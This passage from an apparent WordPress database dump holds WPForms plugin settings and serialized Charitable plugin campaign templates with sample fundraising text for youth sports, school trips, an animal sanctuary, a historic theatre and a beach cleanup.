02:41:21','yes'),(458123,'wpforms_version_previous','1.9.5.1','yes'),(458126,'wpforms_splash_data_version','1.9.5','yes'),(458128,'_wpforms_transient_wpforms_/storage/v6964/gopalak/public_html/wp-content/uploads/wpforms/cache/.htaccess_file','a:3:{s:4:\"size\";i:446;s:5:\"mtime\";i:1713905780;s:5:\"ctime\";i:1713905780;}','yes'),(461899,'wpforms_email_summaries_info_blocks_sent','a:1:{i:0;i:521223;}','yes'),(461900,'wpforms_email_summaries_shown_notifications','a:2:{i:0;i:236;i:1;i:225;}','no'),(461962,'arm_lite_version_updated_date_4.0.31','2024-04-30 06:01:45','yes'),(468128,'charitable_campaign_builder_templates','a:3:{s:7:\"version\";s:5:\"1.0.0\";s:10:\"date_added\";i:1715631087;s:9:\"templates\";a:12:{s:12:\"simple-1-col\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:15:\"Simple 1 Column\";s:4:\"slug\";s:15:\"simple-1-column\";s:11:\"description\";s:52:\"A simple one column campaign template to build from.\";s:13:\"template_type\";a:2:{i:0;s:6:\"single\";i:1;s:6:\"simple\";}s:11:\"search_tags\";a:4:{i:0;s:7:\"default\";i:1;s:6:\"simple\";i:2;s:5:\"blank\";i:3;s:5:\"clean\";}s:10:\"categories\";a:1:{i:0;s:7:\"default\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:7:\"preview\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#000000\";s:9:\"secondary\";s:7:\"#2B66D1\";s:8:\"tertiary\";s:7:\"#F99E36\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#5AA152\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:0:{}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:1:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:0:{}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:281:\"<p><strong>This is a description of your campaign.</strong></p><p>Write one or two short paragraphs about what you want to accomplish and perhaps brief of origin of this campaign, past campaigns, and feature key people and events that will enspire people to give to your cause.</p>\";}}}s:12:\"simple-2-col\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:15:\"Simple 2 Column\";s:4:\"slug\";s:15:\"simple-2-column\";s:11:\"description\";s:52:\"A simple two column campaign template to build from.\";s:13:\"template_type\";a:2:{i:0;s:6:\"single\";i:1;s:6:\"simple\";}s:11:\"search_tags\";a:4:{i:0;s:7:\"default\";i:1;s:6:\"simple\";i:2;s:5:\"blank\";i:3;s:5:\"clean\";}s:10:\"categories\";a:1:{i:0;s:7:\"default\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:7:\"preview\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#000000\";s:9:\"secondary\";s:7:\"#2B66D1\";s:8:\"tertiary\";s:7:\"#F99E36\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#5AA152\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:0:{}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:0:{}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:1:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:0:{}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:281:\"<p><strong>This is a description of your campaign.</strong></p><p>Write one or two short paragraphs about what you want to accomplish and perhaps brief of origin of this campaign, past campaigns, and feature key people and events that will enspire people to give to your cause.</p>\";}}}s:19:\"simple-2-col-header\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:25:\"Simple 2 Column w/ header\";s:4:\"slug\";s:22:\"simple-2-column-header\";s:11:\"description\";s:41:\"A simple two column layout with a header.\";s:13:\"template_type\";a:2:{i:0;s:6:\"single\";i:1;s:6:\"simple\";}s:11:\"search_tags\";a:4:{i:0;s:7:\"default\";i:1;s:6:\"simple\";i:2;s:5:\"blank\";i:3;s:5:\"clean\";}s:10:\"categories\";a:1:{i:0;s:7:\"default\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:7:\"preview\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#000000\";s:9:\"secondary\";s:7:\"#2B66D1\";s:8:\"tertiary\";s:7:\"#F99E36\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#5AA152\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;}s:6:\"layout\";a:3:{i:0;a:3:{s:4:\"type\";s:6:\"header\";s:9:\"css_class\";s:17:\"charitable-header\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:0:{}}}}}i:1;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:0:{}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:0:{}}}}}i:2;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:1:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:0:{}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:281:\"<p><strong>This is a description of your campaign.</strong></p><p>Write one or two short paragraphs about what you want to accomplish and perhaps brief of origin of this campaign, past campaigns, and feature key people and events that will enspire people to give to your cause.</p>\";}}}s:12:\"youth-sports\";a:4:{s:4:\"meta\";a:15:{s:5:\"label\";s:12:\"Youth Sports\";s:4:\"slug\";s:12:\"youth-sports\";s:11:\"description\";s:63:\"Accept donations for a local school\'s sports or athletics team.\";s:13:\"template_type\";a:1:{i:0;s:6:\"single\";}s:11:\"search_tags\";a:3:{i:0;s:5:\"youth\";i:1;s:6:\"sports\";i:2;s:4:\"blue\";}s:10:\"categories\";a:3:{i:0;s:6:\"sports\";i:1;s:5:\"youth\";i:2;s:17:\"special-occasions\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#102963\";s:9:\"secondary\";s:7:\"#0D0D0D\";s:8:\"tertiary\";s:7:\"#989898\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#ec5f25\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:2:{i:0;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:9:\"photo.jpg\";}i:1;a:1:{s:4:\"type\";s:16:\"campaign-summary\";}}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:4:{i:0;a:1:{s:4:\"type\";s:14:\"campaign-title\";}i:1;a:6:{s:4:\"type\";s:12:\"progress-bar\";s:9:\"show_hide\";a:2:{s:12:\"show_donated\";b:1;s:9:\"show_goal\";b:1;}s:9:\"css_class\";s:16:\"sample-css-class\";s:12:\"label_donate\";s:1:\" \";s:10:\"label_goal\";s:10:\"Goal USD: \";s:13:\"meta_position\";s:3:\"top\";}i:2;a:2:{s:4:\"type\";s:13:\"donate-amount\";s:8:\"headline\";s:16:\"Select An Amount\";}i:3;a:2:{s:4:\"type\";s:13:\"donate-button\";s:12:\"button_label\";s:10:\"Donate Now\";}}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:3:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:2:{i:0;a:3:{s:4:\"type\";s:20:\"campaign-description\";s:8:\"headline\";s:40:\"Make every minute on the field count ⚾\";s:7:\"content\";s:761:\"<p>We are announcing a campaign to bolster our local youth sports team, comprised of enthusiastic youngsters aged 8-12. Your support will enable us to update their uniforms, provide essential supplies, ensure a safe playing environment, and offer security measures on the field. Additionally, your contributions will go towards accommodations for parents and teachers, fostering a supportive community atmosphere where these young athletes can thrive. Join us in nurturing the next generation of athletes, empowering them with the resources and encouragement they need to excel both on and off the field.</p><p>Together, let\'s create a positive and inspiring environment for our youth, fostering a love for sports and teamwork that will last a lifetime.?</p>\";}i:1;a:4:{s:4:\"type\";s:16:\"ambassadors-team\";s:8:\"headline\";s:16:\"Top Team Members\";s:7:\"columns\";i:6;s:14:\"upgrade-img-bg\";s:14:\"field-team.jpg\";}}}i:1;a:4:{s:5:\"title\";s:7:\"Updates\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"updates\";s:6:\"fields\";a:1:{s:12:\"updates-main\";a:2:{s:8:\"headline\";s:16:\"Top Team Members\";s:7:\"columns\";i:6;}}}i:2;a:4:{s:5:\"title\";s:8:\"Comments\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:8:\"comments\";s:6:\"fields\";a:1:{s:13:\"comments-main\";a:2:{s:8:\"headline\";s:16:\"Top Team Members\";s:7:\"columns\";i:6;}}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:7:\"minimum\";s:8:\"tab_size\";s:5:\"small\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:761:\"<p>We are announcing a campaign to bolster our local youth sports team, comprised of enthusiastic youngsters aged 8-12. Your support will enable us to update their uniforms, provide essential supplies, ensure a safe playing environment, and offer security measures on the field. Additionally, your contributions will go towards accommodations for parents and teachers, fostering a supportive community atmosphere where these young athletes can thrive. Join us in nurturing the next generation of athletes, empowering them with the resources and encouragement they need to excel both on and off the field.</p><p>Together, let\'s create a positive and inspiring environment for our youth, fostering a love for sports and teamwork that will last a lifetime.?</p>\";}}}s:11:\"school-trip\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:11:\"School Trip\";s:4:\"slug\";s:11:\"school-trip\";s:11:\"description\";s:44:\"Raise funds for a school trip or fundraiser.\";s:13:\"template_type\";a:1:{i:0;s:6:\"single\";}s:11:\"search_tags\";a:4:{i:0;s:5:\"youth\";i:1;s:6:\"sports\";i:2;s:5:\"green\";i:3;s:5:\"brown\";}s:10:\"categories\";a:3:{i:0;s:6:\"sports\";i:1;s:5:\"youth\";i:2;s:6:\"events\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#7A8347\";s:9:\"secondary\";s:7:\"#000000\";s:8:\"tertiary\";s:7:\"#5F5F5F\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#7A8347\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;s:8:\"suffixes\";a:2:{s:12:\"social-links\";s:6:\"-white\";s:14:\"social-sharing\";s:6:\"-white\";}}s:6:\"layout\";a:3:{i:0;a:3:{s:4:\"type\";s:6:\"header\";s:9:\"css_class\";s:17:\"charitable-header\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:1:{i:0;a:4:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:41:\"Help the youth learning with an adventure\";s:7:\"content\";s:102:\"Join us in giving our students the opportunity to explore, learn, and grow on this incredible journey!\";s:5:\"align\";s:6:\"center\";}}}}}}i:1;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:2:{i:0;a:3:{s:4:\"type\";s:20:\"campaign-description\";s:8:\"headline\";s:31:\"Raise fund for our school trip!\";s:7:\"content\";s:527:\"<p>We are announcing a campaign to make the dream of a once-in-a-lifetime field trip come true for our graduating 5th graders: an unforgettable adventure in California! Your support will enable us to purchase necessary supplies, ensure safe travel, and provide accommodations for both parents and teachers accompanying the students. With your contribution, we can create lasting memories and valuable learning experiences, fostering a sense of camaraderie and curiosity that will stay with these young minds for a lifetime.</p>\";}i:1;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:10:\"trip-1.jpg\";}}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:5:{i:0;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:10:\"trip-2.jpg\";}i:1;a:1:{s:4:\"type\";s:16:\"campaign-summary\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:122:\"Together, we can inspire these young minds and equip them with the tools they need to make a positive impact on the world.\";s:7:\"content\";s:373:\"Your generosity will not only provide the means for this adventure but will also contribute to the overall educational enrichment of our students. This trip isn\'t just a mere excursion; it\'s a chance for our 5th graders to expand their horizons, learn about different cultures, and engage with historical and natural wonders that will enhance their academic understanding. \";}i:3;a:6:{s:4:\"type\";s:12:\"progress-bar\";s:9:\"show_hide\";a:2:{s:12:\"show_donated\";b:1;s:9:\"show_goal\";b:1;}s:9:\"css_class\";s:16:\"sample-css-class\";s:12:\"label_donate\";s:8:\"Funded: \";s:10:\"label_goal\";s:6:\"Goal: \";s:13:\"meta_position\";s:3:\"top\";}i:4;a:4:{s:4:\"type\";s:12:\"social-links\";s:8:\"headline\";s:9:\"Follow on\";s:12:\"facebook_url\";s:21:\"https://facebook.com/\";s:11:\"twitter_url\";s:20:\"https://twitter.com/\";}}}}}}i:2;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:1:{i:0;a:4:{s:5:\"title\";s:10:\"Donate Now\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:1:{i:0;a:1:{s:4:\"type\";s:13:\"donation-form\";}}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:493:\"<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliqui.Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliqui.Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod</p>\";}}}s:16:\"animal-sanctuary\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:16:\"Animal Sanctuary\";s:4:\"slug\";s:16:\"animal-sanctuary\";s:11:\"description\";s:53:\"Get funds for your mission to rescue or rehabilitate.\";s:13:\"template_type\";a:1:{i:0;s:6:\"single\";}s:11:\"search_tags\";a:3:{i:0;s:11:\"animal-pets\";i:1;s:13:\"environmental\";i:2;s:4:\"blue\";}s:10:\"categories\";a:2:{i:0;s:11:\"animal-pets\";i:1;s:13:\"environmental\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#805F93\";s:9:\"secondary\";s:7:\"#1D1C1C\";s:8:\"tertiary\";s:7:\"#808080\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#805F93\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;s:8:\"suffixes\";a:2:{s:14:\"social-sharing\";s:5:\"-dark\";s:12:\"social-links\";s:5:\"-dark\";}}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:4:{i:0;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-1.jpg\";}i:1;a:3:{s:4:\"type\";s:20:\"campaign-description\";s:8:\"headline\";s:70:\"Donate today to support our mission to rescue, rehabilitate and rehome\";s:7:\"content\";s:624:\"<p>I\'m thrilled to launch our new campaign aimed at supporting an incredible cause: an animal sanctuary dedicated to rescuing abandoned and lost animals and finding them loving homes. With your help, we aim to raise funds to maintain this sanctuary, providing a safe haven for these adorable pets and ensuring they receive the care they deserve. Your contributions will not only help us sustain the facility but also enable us to actively seek new, caring families for these animals, giving them a chance at a brighter and happier future. Together, we can make a real difference in the lives of these innocent creatures.</p>\";}i:2;a:1:{s:4:\"type\";s:16:\"campaign-summary\";}i:3;a:2:{s:4:\"type\";s:13:\"donate-button\";s:12:\"button_label\";s:10:\"Donate Now\";}}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:3:{i:0;a:3:{s:4:\"type\";s:9:\"organizer\";s:13:\"role_or_title\";s:9:\"Organizer\";s:7:\"content\";s:0:\"\";}i:1;a:4:{s:4:\"type\";s:14:\"social-sharing\";s:8:\"headline\";s:9:\"Share Now\";s:12:\"facebook_url\";s:21:\"https://facebook.com/\";s:11:\"twitter_url\";s:20:\"https://twitter.com/\";}i:2;a:5:{s:4:\"type\";s:12:\"social-links\";s:8:\"headline\";s:10:\"Follow Now\";s:12:\"facebook_url\";s:21:\"https://facebook.com/\";s:11:\"twitter_url\";s:20:\"https://twitter.com/\";s:13:\"instagram_url\";s:22:\"https://instagram.com/\";}}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:1:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:1:{i:0;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:8:\"About Us\";s:7:\"content\";s:46:\"We are an animal santuary established in 2007.\";}}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:624:\"<p>I\'m thrilled to launch our new campaign aimed at supporting an incredible cause: an animal sanctuary dedicated to rescuing abandoned and lost animals and finding them loving homes. With your help, we aim to raise funds to maintain this sanctuary, providing a safe haven for these adorable pets and ensuring they receive the care they deserve. Your contributions will not only help us sustain the facility but also enable us to actively seek new, caring families for these animals, giving them a chance at a brighter and happier future. Together, we can make a real difference in the lives of these innocent creatures.</p>\";}}}s:15:\"save-the-museum\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:15:\"Save The Museum\";s:4:\"slug\";s:15:\"save-the-museum\";s:11:\"description\";s:61:\"Save a histroical building, residence, or important landmark.\";s:13:\"template_type\";a:1:{i:0;s:6:\"single\";}s:11:\"search_tags\";a:3:{i:0;s:5:\"legal\";i:1;s:17:\"special-occasions\";i:2;s:4:\"blue\";}s:10:\"categories\";a:3:{i:0;s:5:\"legal\";i:1;s:18:\"club-organizations\";i:2;s:17:\"special-occasions\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#F58A07\";s:9:\"secondary\";s:7:\"#1D3444\";s:8:\"tertiary\";s:7:\"#5B5B5B\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#FFFFFF\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;s:8:\"suffixes\";a:2:{s:14:\"social-sharing\";s:5:\"-dark\";s:12:\"social-links\";s:5:\"-dark\";}}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:2:{i:0;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-1.jpg\";}i:1;a:3:{s:4:\"type\";s:20:\"campaign-description\";s:8:\"headline\";s:18:\"About This Project\";s:7:\"content\";s:409:\"<p>In 1918 the top floor of the Lyric Theatre was converted into a hospital to care for the sick and dying during the Spanish Flu Epidemic. A nurse, Mrs. Lapp, was forced to care for all of families upstairs. Today nearly 100 years later the top floor of the Lyric remains unused and it’s sole occupant is the spirit of Nurse Lapp. We are trying to save this abandoned building with the help of you all.</p>\";}}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:5:{i:0;a:1:{s:4:\"type\";s:14:\"campaign-title\";}s:12:\"progress-bar\";a:5:{s:9:\"show_hide\";a:2:{s:12:\"show_donated\";b:1;s:9:\"show_goal\";b:0;}s:9:\"css_class\";s:16:\"sample-css-class\";s:12:\"label_donate\";s:7:\"Funded \";s:10:\"label_goal\";s:10:\"Goal USD: \";s:13:\"meta_position\";s:3:\"top\";}i:1;a:1:{s:4:\"type\";s:16:\"campaign-summary\";}i:2;a:2:{s:4:\"type\";s:13:\"donate-button\";s:12:\"button_label\";s:10:\"Donate Now\";}i:3;a:4:{s:4:\"type\";s:12:\"social-links\";s:8:\"headline\";s:9:\"Follow on\";s:12:\"facebook_url\";s:21:\"https://facebook.com/\";s:11:\"twitter_url\";s:20:\"https://twitter.com/\";}}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:3:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:2:{i:0;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:25:\"Save the Lyrique Building\";s:7:\"content\";s:1002:\"<p>Mrs. Lapp\'s spirit is said to linger in the hushed corners of the Lyric Theatre, her presence felt by those who dare to venture to the top floor. Visitors claim to have heard soft whispers and felt a comforting presence, as if she\'s still watching over the space she once tended to with such dedication. The abandoned building stands as a testament to the resilience of the human spirit during times of crisis, and it has become a symbol of hope and survival. Efforts to preserve the Lyric Theatre are fueled by the desire to honor Mrs. Lapp\'s legacy and the countless lives she touched.</p><p>The community has rallied together, sharing stories of her bravery and compassion, inspiring a new generation to join the cause. With each donation and volunteer effort, the echoes of the past grow stronger, uniting people across time in a shared mission to save this historical landmark and the memory of Nurse Lapp, reminding us all of the power of compassion and community in the face of adversity.</p>\";}i:1;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-2.jpg\";}}}i:1;a:4:{s:5:\"title\";s:7:\"Updates\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"updates\";s:6:\"fields\";a:1:{s:12:\"updates-main\";a:2:{s:8:\"headline\";s:16:\"Top Team Members\";s:7:\"columns\";i:6;}}}i:2;a:4:{s:5:\"title\";s:8:\"Comments\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:8:\"comments\";s:6:\"fields\";a:1:{s:13:\"comments-main\";a:2:{s:8:\"headline\";s:16:\"Top Team Members\";s:7:\"columns\";i:6;}}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:409:\"<p>In 1918 the top floor of the Lyric Theatre was converted into a hospital to care for the sick and dying during the Spanish Flu Epidemic. A nurse, Mrs. Lapp, was forced to care for all of families upstairs. Today nearly 100 years later the top floor of the Lyric remains unused and it’s sole occupant is the spirit of Nurse Lapp. We are trying to save this abandoned building with the help of you all.</p>\";}}}s:13:\"environmental\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:13:\"Environmental\";s:4:\"slug\";s:13:\"environmental\";s:11:\"description\";s:53:\"Preserve nature and the earth for future generations.\";s:13:\"template_type\";a:1:{i:0;s:6:\"single\";}s:11:\"search_tags\";a:3:{i:0;s:13:\"environmental\";i:1;s:11:\"animal-pets\";i:2;s:4:\"blue\";}s:10:\"categories\";a:2:{i:0;s:13:\"environmental\";i:1;s:11:\"animal-pets\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#F9F6EE\";s:9:\"secondary\";s:7:\"#24231E\";s:8:\"tertiary\";s:7:\"#61AA4F\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#61AA4F\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;s:8:\"suffixes\";a:2:{s:14:\"social-sharing\";s:5:\"-dark\";s:12:\"social-links\";s:5:\"-dark\";}}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:1:{i:0;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-1.jpg\";}}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:5:{i:0;a:5:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:10:\"Save Earth\";s:7:\"content\";s:116:\"Together, let\'s reclaim the serenity of our shorelines and ensure a cleaner, greener future for generations to come.\";s:16:\"width_percentage\";i:75;s:5:\"align\";s:4:\"left\";}i:1;a:5:{s:4:\"type\";s:20:\"campaign-description\";s:8:\"headline\";s:48:\"Help Preserving The Earth For Future Generations\";s:7:\"content\";s:424:\"<p>We are announcing a campaign dedicated to restoring the natural beauty of our local beach, which has sadly fallen victim to years of neglect and pollution. Our non-profit is on a mission to raise funds for cleaning supplies, vehicles, and essential costs to orchestrate a massive cleanup effort. By contributing, you\'re not just supporting a cleaner beach but also promoting environmental health and community pride. </p>\";s:16:\"width_percentage\";i:75;s:5:\"align\";s:4:\"left\";}i:2;a:3:{s:4:\"type\";s:16:\"campaign-summary\";s:16:\"width_percentage\";i:100;s:5:\"align\";s:4:\"left\";}i:3;a:4:{s:4:\"type\";s:13:\"donate-button\";s:12:\"button_label\";s:10:\"Donate Now\";s:16:\"width_percentage\";i:75;s:5:\"align\";s:4:\"left\";}i:4;a:5:{s:4:\"type\";s:12:\"social-links\";s:8:\"headline\";s:1:\" 